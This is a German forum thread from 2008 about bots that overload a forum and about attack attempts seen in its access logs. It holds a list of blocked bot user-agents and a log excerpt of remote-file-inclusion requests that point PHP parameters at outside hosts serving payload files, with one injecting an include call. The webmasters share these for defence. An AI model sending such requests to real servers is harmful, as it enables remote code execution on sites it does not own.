zurück zur Startseite
  


Zurück XHTMLforum > Sonstiges > Offtopic
Seite neu laden Erfahrungen mit bösen Bots und XSS

Antwort
 
LinkBack Themen-Optionen Ansicht
  #1 (permalink)  
Alt 05.04.2008, 12:27
Benutzerbild von hemfrie
Administrator
XHTMLforum-Kenner
Thread-Ersteller
 
Registriert seit: 18.12.2003
Ort: Düsseldorf
Beiträge: 2.776
hemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannt
Standard Erfahrungen mit bösen Bots und XSS

In letzter Zeit finde ich vermehrt Logeinträge von Bots, die sich raffgierig über das Forum hermachen. Ich will den Thread hier mal nutzen um solche Bots aufzulisten, da evtl. der ein oder andere ebenfalls davon betroffen sein könnte.

Im Moment habe ich folgende (Spam)-Bots ausgesperrt:
  • Whacker
  • TMCrawler
  • Java
  • EmailCollector
  • EmailSiphon
  • EmailWolf
  • Gigabot
  • FileHound
  • TurnitinBot
  • JoBo
  • adressendeutschland
  • MJ12bot
  • Twiceler
Am aktivsten davon sind der "Gigabot" und in den letzten Tagen "Twiceler".

Zu den ganzen Bots, die den Serverload ordentlich erhöhen, kommen noch die XSS Versuche.

Hier mal ein kleiner Logauszug davon:
Code:
66.70.14.90 - - [05/Apr/2008:09:39:51 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/images/banners/canboy? HTTP/1.1" 404 324 "-" "libwww-perl/5.79"
84.19.182.143 - - [05/Apr/2008:09:45:25 +0200] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://domain.tld/ioncube/readme.txt?? HTTP/1.1" 404 324 "-" "libwww-perl/5.79"
217.18.130.26 - - [05/Apr/2008:09:45:37 +0200] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://domain.tld/on.txt?????? HTTP/1.1" 404 324 "-" "libwww-perl/5.803"
80.238.225.165 - - [05/Apr/2008:09:47:25 +0200] "GET /50845-mod_rewrite-reihenfolge.html HTTP/1.1" 403 45936 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:09:47:26 +0200] "GET /index.php?l=http://domain.tld/members/.debug/id1.txt??? HTTP/1.1" 403 41422 "-" "libwww-perl/5.805"
213.203.223.115 - - [05/Apr/2008:10:00:23 +0200] "GET /51019-probleme-im-ie.html HTTP/1.1" 403 37792 "-" "libwww-perl/5.805"
213.203.223.115 - - [05/Apr/2008:10:00:23 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/.dat/idscan3.txt??? HTTP/1.1" 404 324 "-" "libwww-perl/5.805"
217.171.66.229 - - [05/Apr/2008:10:04:27 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/php5/id.txt??? HTTP/1.1" 404 324 "-" "libwww-perl/5.65"
64.15.138.183 - - [05/Apr/2008:10:05:54 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/php5/id.txt??? HTTP/1.1" 404 324 "-" "libwww-perl/5.808"
212.227.98.178 - - [05/Apr/2008:10:07:22 +0200] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://domain.tld/lia/bot/s.txt? HTTP/1.1" 404 324 "-" "libwww-perl/5.803"
217.18.130.26 - - [05/Apr/2008:10:20:20 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/on.txt?????? HTTP/1.1" 404 324 "-" "libwww-perl/5.803"
193.253.51.34 - - [05/Apr/2008:10:40:12 +0200] "GET //webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://domain.tld/images/.bash/indexfile.txt? HTTP/1.1" 404 324 "-" "libwww-perl/5.79"
193.253.51.34 - - [05/Apr/2008:10:40:28 +0200] "GET /42601-kleines-projekt-mykaoz-design-html-css.html//webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://domain.tld/images/.bash/indexfile.txt? HTTP/1.1" 404 324 "-" "libwww-perl/5.79"
204.185.158.220 - - [05/Apr/2008:10:44:20 +0200] "GET /index.php?include=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 403 41931 "-" "libwww-perl/5.803"
201.17.3.26 - - [05/Apr/2008:11:11:33 +0200] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://domain.tld/.ownz/safeon.dat?????????? HTTP/1.1" 301 549 "-" "libwww-perl/5.79"
201.17.3.26 - - [05/Apr/2008:11:11:35 +0200] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&a=http://domain.tld/.ownz/safeon.dat?????????? HTTP/1.1" 404 17335 "-" "libwww-perl/5.79"
80.238.225.165 - - [05/Apr/2008:11:16:59 +0200] "GET /50509-per-htaccess-script-php-ausf-hren.html/index.php?script=http://domain.tld/members/.debug/id1.txt??? HTTP/1.1" 301 373 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:11:16:59 +0200] "GET /index.php HTTP/1.1" 403 43477 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:11:17:00 +0200] "GET /index.php?script=http://domain.tld/members/.debug/id1.txt??? HTTP/1.1" 403 42679 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:11:22:41 +0200] "GET /50509-per-htaccess-script-php-ausf-hren.html/index.php?script=http://domain.tld/members/.debug/id1.txt? HTTP/1.1" 301 373 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:11:22:42 +0200] "GET /index.php HTTP/1.1" 403 43438 "-" "libwww-perl/5.805"
80.238.225.165 - - [05/Apr/2008:11:22:43 +0200] "GET /index.php?script=http://domain.tld/members/.debug/id1.txt? HTTP/1.1" 403 42703 "-" "libwww-perl/5.805"
201.17.3.26 - - [05/Apr/2008:11:24:22 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://domain.tld/.ownz/safeon.dat?????????? HTTP/1.1" 403 385 "-" "libwww-perl/5.79"
201.17.3.26 - - [05/Apr/2008:11:24:25 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://domain.tld/.ownz/safeon.dat?????????? HTTP/1.1" 403 385 "-" "libwww-perl/5.79"
74.208.111.178 - - [05/Apr/2008:11:26:41 +0200] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://domain.tld/images/stories/id2.txt?? HTTP/1.1" 404 324 "-" "libwww-perl/5.805"
213.239.195.243 - - [05/Apr/2008:11:33:11 +0200] "GET /includes/functions_portal.php?phpbb_root_path=http://domain.tld/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 324 "-" "libwww-perl/5.805"
201.86.201.202 - - [05/Apr/2008:11:37:44 +0200] "GET //index.php?option=com_content&task=view&id=&mosConfig_absolute_path=http://domain.tld/.ownz/safeon.dat?????????? HTTP/1.1" 403 42871 "-" "libwww-perl/5.803"
204.92.87.157 - - [05/Apr/2008:11:46:16 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/on.txt?????? HTTP/1.1" 404 324 "-" "libwww-perl/5.808"
83.68.228.146 - - [05/Apr/2008:11:47:27 +0200] "GET /admincp/auth/checklogin.php?cfgProgDir=http://domain.tld/on.txt?????? HTTP/1.1" 404 324 "-" "libwww-perl/5.805"
88.78.147.113 - - [05/Apr/2008:11:50:45 +0200] "GET / HTTP/1.1" 403 1382 "http://domain.tld/" "libwww-perl"
203.150.225.183 - - [05/Apr/2008:11:50:46 +0200] "GET //impex/ImpExModule.php?systempath=http://domain.tld/www/modul/d.txt??? HTTP/1.1" 403 1344 "-" "libwww-perl/5.79"
60.249.45.142 - - [05/Apr/2008:11:53:46 +0200] "GET //index.php?option=com_content&task=view&id=&mosConfig_absolute_path=http://domain.tld/on.txt?? HTTP/1.1" 403 1344 "-" "libwww-perl/5.79"
libwww-perl hab ich ebenfalls komplett ausgesperrt, da damit zu 95% Unsinn versucht wird.

Wie sind Eure Erfahrungen mit ungewollten Besuchern?
Kennt Ihr noch andere Bots, die Euch schon den Server breitgefahren haben?

Geändert von hemfrie (05.04.2008 um 12:56 Uhr)
Mit Zitat antworten
Sponsored Links
  #2 (permalink)  
Alt 05.04.2008, 13:03
Benutzerbild von Crizzo
der mit dem Editor kämpft
XHTMLforum-Kenner
 
Registriert seit: 17.10.2006
Ort: Ost-Hessen
Beiträge: 4.828
Crizzo ist ein sehr geschätzer MenschCrizzo ist ein sehr geschätzer MenschCrizzo ist ein sehr geschätzer MenschCrizzo ist ein sehr geschätzer Mensch
Standard

Ich hatte bei mir im Forum und beim Kontaktformular-Bots, die gespammt haben.
Beim Forum hab ich den Gästen das "posten" verboten und das Kontaktformular bekam ein "denk-Captcha" und nun ging es.
Ich wüsste jetzt nicht, wo ich sehen sollte, wie die Bots hießen bzw. wie man sie dann aussperren könnte.
__________________
Ohne Quelltext gibts selten Hilfe. Also: Onlinebeispiel hochladen und Link bereitstellen!
Foren-FAQ
Mit Zitat antworten
Sponsored Links
  #3 (permalink)  
Alt 05.04.2008, 13:11
Benutzerbild von hemfrie
Administrator
XHTMLforum-Kenner
Thread-Ersteller
 
Registriert seit: 18.12.2003
Ort: Düsseldorf
Beiträge: 2.776
hemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannt
Standard

Zitat:
Zitat von BlackHawk Beitrag anzeigen
Ich wüsste jetzt nicht, wo ich sehen sollte, wie die Bots hießen bzw. wie man sie dann aussperren könnte.
Das ist unterschiedlich, je nachdem ob Du ein Webpaket oder einen Server mit Rootzugriff hast.

Bei normalen Webpaketen werden die Logdateien meistens irgendwo in der Webadministration verlinkt. In der access_log Datei findest Du dann sämtliche Zugriffe auf Deine Webseite.

Aussperren kann man die Bots mit Hilfe von mod_rewrite:
Bots & Spider per mod_rewrite aussperren - huschi.net

Wobei die Methode zwar meistens hilft aber keinen 100% Schutz bietet. User-Agents kann man nunmal beliebig verändern.
Deswegen sollte man regelmäßig die Logs durchstöbern um einen Überblick über aktuelle Bots zu erhalten.

Geändert von hemfrie (05.04.2008 um 13:15 Uhr)
Mit Zitat antworten
  #4 (permalink)  
Alt 05.04.2008, 15:51
Benutzerbild von Dieter
Erfahrener Benutzer
XHTMLforum-Kenner
 
Registriert seit: 12.09.2003
Beiträge: 3.640
Dieter sorgt für eine eindrucksvolle AtmosphäreDieter sorgt für eine eindrucksvolle Atmosphäre
Standard

Hallo, Dirk!

Meine Logdateien inspiziere ich ziemlich regelmäßig und seit ich mich etwas intensiver mit dem von Dir geschilderten Problem befasst habe, steht mein Entschluss, kein "well known CMS" zu verwenden, noch stabiler als bisher!

Handgedengeltes HTML mit einer kleinen (unvermeidlichen) Prise PHP ist weniger angreifbar!

Besonderes Interesse rufen bei meiner Seite im übrigen die Formulare hervor: Kontakt, Suche und Gästebuch. Da beißen sich die Spammer (bisher) aber die Zähne dran aus.

Und die Aufmerksamkeit wegen der Kinder(zeichnungen) war glücklicherweise (nach einer Umbenennung) nur eine temporäre.
__________________
Informationen aus Koblenz-Metternich
-----------------------------------
"Wissen heißt, Fragen zu erwerben."
Mit Zitat antworten
  #5 (permalink)  
Alt 05.04.2008, 16:29
Benutzerbild von hemfrie
Administrator
XHTMLforum-Kenner
Thread-Ersteller
 
Registriert seit: 18.12.2003
Ort: Düsseldorf
Beiträge: 2.776
hemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannt
Standard

Zitat:
Zitat von Dieter Beitrag anzeigen
Hallo, Dirk!

Meine Logdateien inspiziere ich ziemlich regelmäßig und seit ich mich etwas intensiver mit dem von Dir geschilderten Problem befasst habe, steht mein Entschluss, kein "well known CMS" zu verwenden, noch stabiler als bisher!
Darüber lässt sich sicher streiten. Einerseits sind bekannte und weit verbreitete Webanwendungen natürlich sehr im Fokus von Hackern, Scriptkiddies etc.

Andererseits werden solche Anwendungen von mehreren Leuten programmiert und von sehr vielen Menschen eingesetzt. Nach dem Motto "mehrere Augen sehen mehr" werden Sicherheitslücken meist sehr schnell gefunden und gefixt.

Gefährlich und fahrlässig ist es nur, wenn Webmaster nach bekannt werden solcher Sicherheitslücken ihre Software nicht mit den entsprechenden Updates und fixes sichern.
Mit Zitat antworten
  #6 (permalink)  
Alt 05.04.2008, 16:51
Benutzerbild von Dieter
Erfahrener Benutzer
XHTMLforum-Kenner
 
Registriert seit: 12.09.2003
Beiträge: 3.640
Dieter sorgt für eine eindrucksvolle AtmosphäreDieter sorgt für eine eindrucksvolle Atmosphäre
Standard

Hallo, Dirk!

Ein ziemlicher Nachteil bei bekannter Foren-, Board- und CMS-Software ist der Umstand, dass sie "von weitem" erkennbar ist. Herkunftshinweise in Meta-Tags und Werbelinks laden doch gerade dazu ein, an bekannten Schwachstellen anzusetzen.

Dass wir uns nicht falsch verstehen: die Schuld liegt nicht bei den in aller Regel auch um Sicherheit bemühten Autoren der Software - sondern einzig und allein bei den erstaunlich vielen Gaunern auf dieser schönen Welt!
__________________
Informationen aus Koblenz-Metternich
-----------------------------------
"Wissen heißt, Fragen zu erwerben."
Mit Zitat antworten
  #7 (permalink)  
Alt 05.04.2008, 17:01
Benutzerbild von laborix
Erfahrener Benutzer
XHTMLforum-Kenner
 
Registriert seit: 11.12.2005
Beiträge: 1.494
laborix ist ein sehr geschätzer Menschlaborix ist ein sehr geschätzer Menschlaborix ist ein sehr geschätzer Mensch
Standard

Zitat:
Zitat von hemfrie Beitrag anzeigen
Wie sind Eure Erfahrungen mit ungewollten Besuchern?
Ein Forum habe ich nicht, aber zwei Blogs. Und in beiden Blogs ist Bad-Behavior aktiv. Blockt so ziemlich alles was nach Spammer oder so was aussieht.

Bad Behavior / Bad Behaviour: Home

Ob man das für das Forum einsetzen kann, weiss ich nicht. Aber die "default" Konfiguration läßt sich mittels PHP in jeder Webseite aktivieren. Kannst du dir ja mal anschauen, ob das eventuell etwas für das Forum wäre
__________________
Personal stuff
Mit Zitat antworten
  #8 (permalink)  
Alt 05.04.2008, 17:19
Benutzerbild von hemfrie
Administrator
XHTMLforum-Kenner
Thread-Ersteller
 
Registriert seit: 18.12.2003
Ort: Düsseldorf
Beiträge: 2.776
hemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannt
Standard

Zitat:
Zitat von laborix Beitrag anzeigen
Ein Forum habe ich nicht, aber zwei Blogs. Und in beiden Blogs ist Bad-Behavior aktiv. Blockt so ziemlich alles was nach Spammer oder so was aussieht.

Bad Behavior / Bad Behaviour: Home

Ob man das für das Forum einsetzen kann, weiss ich nicht. Aber die "default" Konfiguration läßt sich mittels PHP in jeder Webseite aktivieren. Kannst du dir ja mal anschauen, ob das eventuell etwas für das Forum wäre
Danke Dir für den Link.

Ich werde das auch mal mit meinem Blog testen. Im Moment hab ich Akismet im Einsatz, aber das arbeitet natürlich ganz anders. Es lässt den Spam erst durch um ihn dann zu identifizieren.

Die Türsteher-Methode ist da auf jeden Fall schlauer

Geändert von hemfrie (05.04.2008 um 17:24 Uhr)
Mit Zitat antworten
  #9 (permalink)  
Alt 05.04.2008, 17:26
Benutzerbild von laborix
Erfahrener Benutzer
XHTMLforum-Kenner
 
Registriert seit: 11.12.2005
Beiträge: 1.494
laborix ist ein sehr geschätzer Menschlaborix ist ein sehr geschätzer Menschlaborix ist ein sehr geschätzer Mensch
Standard

Zitat:
Zitat von hemfrie Beitrag anzeigen
Im Moment hab ich Askimet im Einsatz, aber das arbeitet natürlich ganz anders. Es lässt den Spam erst durch um ihn dann zu identifizieren.
Mit Bad-Behavior hatte Akismet bei mir lange Zeit "Urlaub". Also beide in Kombination sorgen für ein "gemütliches Bloggen" ohne viel Ärger. Bad Behavior sortiert bei mir etwas mehr als 98% aus, den Rest macht Akismet
__________________
Personal stuff
Mit Zitat antworten
Sponsored Links
  #10 (permalink)  
Alt 05.04.2008, 17:29
Benutzerbild von hemfrie
Administrator
XHTMLforum-Kenner
Thread-Ersteller
 
Registriert seit: 18.12.2003
Ort: Düsseldorf
Beiträge: 2.776
hemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannthemfrie ist jedem bekannt
Standard

Zitat:
Zitat von laborix Beitrag anzeigen
Mit Bad-Behavior hatte Akismet bei mir lange Zeit "Urlaub". Also beide in Kombination sorgen für ein "gemütliches Bloggen" ohne viel Ärger. Bad Behavior sortiert bei mir etwas mehr als 98% aus, den Rest macht Akismet
Klingt gut

Akismet arbeitet bei mir zwar recht gut, aber im Grunde nervt es mich schon, wenn ich dort täglich x-Spameinträge in der Kommentar-Verwaltung moderieren muss.

Das wird eine gute Testumgebung für BB *g*
Mit Zitat antworten
Sponsored Links
Antwort

Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
[Hilfe] Guestbook wird von Bots geflooded Hashishin Serveradministration und serverseitige Scripte 3 08.06.2009 21:53
Präsentationen mit Webstandards (S5 etc.): Eure Erfahrungen AndreasB (X)HTML 21 27.01.2007 23:47


Alle Zeitangaben in WEZ +2. Es ist jetzt 21:59 Uhr.